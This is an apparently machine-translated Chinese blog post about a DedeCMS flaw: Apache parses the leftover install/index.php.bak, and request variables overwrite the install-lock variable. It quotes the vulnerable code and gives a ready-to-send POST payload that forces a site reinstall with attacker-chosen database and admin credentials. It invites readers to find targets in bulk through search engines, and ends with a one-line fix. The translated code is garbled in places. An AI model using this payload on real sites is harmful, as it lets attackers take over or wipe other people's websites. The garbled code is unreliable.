High-risk warning: Dedecms killer and reinstallation vulnerability using apache parsing + variable coverage

Today I saw an article signed by SysShell this vulnerability (http://www.bkjia.com/Article/201306/217870.html), the pen is very concise, gave a test URL, I did not write the original article for a long time, I have been writing a source code audit system recently and will be able to meet with you by the latest week. I have completed high-precision automatic white box audit vulnerabilities, code highlighting, vulnerability locating, function/variable lists, and code debugging, function query, variable/function tracing, automatic upgrade, custom editor, and many practical functions are available.

Now, we should know the danger of this reinstallation vulnerability. I will not say much about it. It is estimated that there will be another batch of standing guns, the condition is that the webserver requires that the apache parsing vulnerability and the install Folder exist.

Exploitation:

After Dedecms is installed, it will back up the Installation File/install/index. php to/install/index. php. bak, which will be parsed into PHP for execution under apache.

Check the code of/install/index. php. bak:

$ VerMsg = 'v5.7 GBKSP1 '; $ s_lang = 'gb2312'; $ dfDbname = 'destmsv57gbksp1'; $ errmsg = ''; $ install_demo_name = 'dev57demo.txt '; $ insLockfile = dirname (_ FILE __). '/Install_lock.txt'; $ moduleCacheFile = dirname (_ FILE __). '/Modules. tmp. inc'; define ('deinc', dirname (_ FILE __). '// Include'); define ('destdata', dirname (_ FILE __). '// Data'); define ('deroot', preg_replace ("# [\\\\\/] install #",'', dirname (_ FILE _); header ("Content-Type: text/html; charset = {$ s_lang}"); require_once (DEDEROOT. '/install. inc. php '); require_once (DEDEINC. '/zip. class. php '); foreach (Array (' _ get', '_ Post',' _ COOKIE ') as $ _ request) {foreach ($ _ request as $ _ k = >$ _ v) $ {$ _ k} = RunMagicQuotes ($ _ v);} require_once (DEDEINC. '/common. func. php '); if (file_exists ($ InsLockfile) {exit ("the program has been installed. If you are sure you want to reinstall it, delete install/install_lock.txt from FTP first! ");} If (empty ($ step) {$ step = 1 ;}

$ InsLockfile = dirname (_ FILE __). '/Install_lock.txt'; is the installation lock file. In the following

If (file_exists ($ insLockfile) {exit ("the program has been run and installed. if you are sure to reinstall it, delete install/install_lock.txt from FTP first! ");}

This Code indicates that if the $ insLockfile file exists, the system prompts that the file has been installed. If $ insLockfile does not exist, you can continue the installation, then we need to control $ insLockfile to reinstall it,

The key issue is that there is another piece of dedecms Code that has been overwritable by variables.

foreach（Array（'_GET','_POST','_COOKIE'） as $_request）{foreach（$$_request as $_k => $_v） ${$_k} = RunMagicQuotes（$_v）；}

This is the registration variable. If there is a variable, it will be overwritten directly.

So we can directly add insLockfile = seay in the request to change $ insLockfile to seay. Of course, the file does not exist. It will be reinstalled.

Demo:

Directly POST data to this URL

Http://www.cnseay.com/dedecms/install/index.php.bak? InsLockfile = 1 & step = 4

OK.

POST Data:

step=4&dbhost=localhost&dbuser=root&dbpwd=123456&dbprefix=dede_&dbname=dedecms1&dblang=gbk&adminuser=admin&adminpwd=admin&cookieencode=JzIVw7439H&webname=%CE%D2%B5%C4%CD%F8%D5%BE&adminmail=admin%40dedecms.com&baseurl=http%3A%2F%2Flocalhost&cmspath=%2Fdedecms

Modify the dbhost information,

Submit data packets. The effect is as follows:

Reinstalled ...... I am a good citizen

Batch EXP won't be written. Let's do it on your own. exp google searches in batches. It is estimated that dedecms's site will waste more than half of the total.

Solution:

Delete install/install. php. bak or change it to install/install. bak.